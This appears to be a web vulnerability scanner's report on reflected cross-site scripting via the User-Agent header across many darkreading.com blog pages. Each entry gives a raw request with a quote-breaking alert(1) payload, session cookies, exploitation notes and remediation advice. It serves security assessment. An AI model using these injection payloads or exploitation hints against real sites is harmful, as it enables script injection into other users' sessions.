GET /blog/227700876/web-based-spam-detection-with-google-alerts.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)42324"-alert(1)-"caed85c53b3 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb576"-alert(1)-"56e3ec9ff8b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fb576"-alert(1)-"56e3ec9ff8b Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17060"-alert(1)-"3703a1c8924 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700968/lock-picking-popularity-grows.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17060"-alert(1)-"3703a1c8924 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66f72"-alert(1)-"f1ee25b6447 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)66f72"-alert(1)-"f1ee25b6447 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94fa3"-alert(1)-"33e931c8169 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94fa3"-alert(1)-"33e931c8169 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae72a"-alert(1)-"da1a9ebd8dd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700998/blocking-zero-days-with-emet-2-0.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae72a"-alert(1)-"da1a9ebd8dd Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65853"-alert(1)-"fd93bf9ab9d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)65853"-alert(1)-"fd93bf9ab9d Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b31d6"-alert(1)-"78ea848ccee was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b31d6"-alert(1)-"78ea848ccee Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb56a"-alert(1)-"9799a4b5946 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bb56a"-alert(1)-"9799a4b5946 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24589"-alert(1)-"280d8a8d9a5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/228200589/nosql-not-much-anyway.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)24589"-alert(1)-"280d8a8d9a5 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 449f7"-alert(1)-"87c6c58a228 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)449f7"-alert(1)-"87c6c58a228 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1daf6"-alert(1)-"0ea747e9dae was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/228600139/avast-ye-pirates-it-s-free.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1daf6"-alert(1)-"0ea747e9dae Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf414"-alert(1)-"d9ad6501155 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bf414"-alert(1)-"d9ad6501155 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bec6"-alert(1)-"f2914f15092 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/01/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2bec6"-alert(1)-"f2914f15092 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c03a"-alert(1)-"5db15ab0102 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/02/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5c03a"-alert(1)-"5db15ab0102 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982a"-alert(1)-"903f6a92568 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/03/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e982a"-alert(1)-"903f6a92568 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6f7c"-alert(1)-"02550c4ddae was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/04/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a6f7c"-alert(1)-"02550c4ddae Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1918a"-alert(1)-"5de19797bcf was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/01/how_hackers_wil.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1918a"-alert(1)-"5de19797bcf Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d501"-alert(1)-"6d719a73b74 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/01/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1d501"-alert(1)-"6d719a73b74 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1dc"-alert(1)-"8e761ac2a9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/02/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6f1dc"-alert(1)-"8e761ac2a9 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992e8"-alert(1)-"661c413c2a1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/02/phpbb_password.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)992e8"-alert(1)-"661c413c2a1 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b581c"-alert(1)-"ba44a797c48 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/03/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b581c"-alert(1)-"ba44a797c48 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c686"-alert(1)-"69eea38f63b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/04/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3c686"-alert(1)-"69eea38f63b Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef34f"-alert(1)-"4e809f24566 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/05/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ef34f"-alert(1)-"4e809f24566 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca564"-alert(1)-"444a34afef1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/06/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ca564"-alert(1)-"444a34afef1 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba0c"-alert(1)-"7947b576908 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/07/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8ba0c"-alert(1)-"7947b576908 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcbec"-alert(1)-"7f757b03da7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2009/08/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dcbec"-alert(1)-"7f757b03da7 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d336e"-alert(1)-"f79a23192d2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
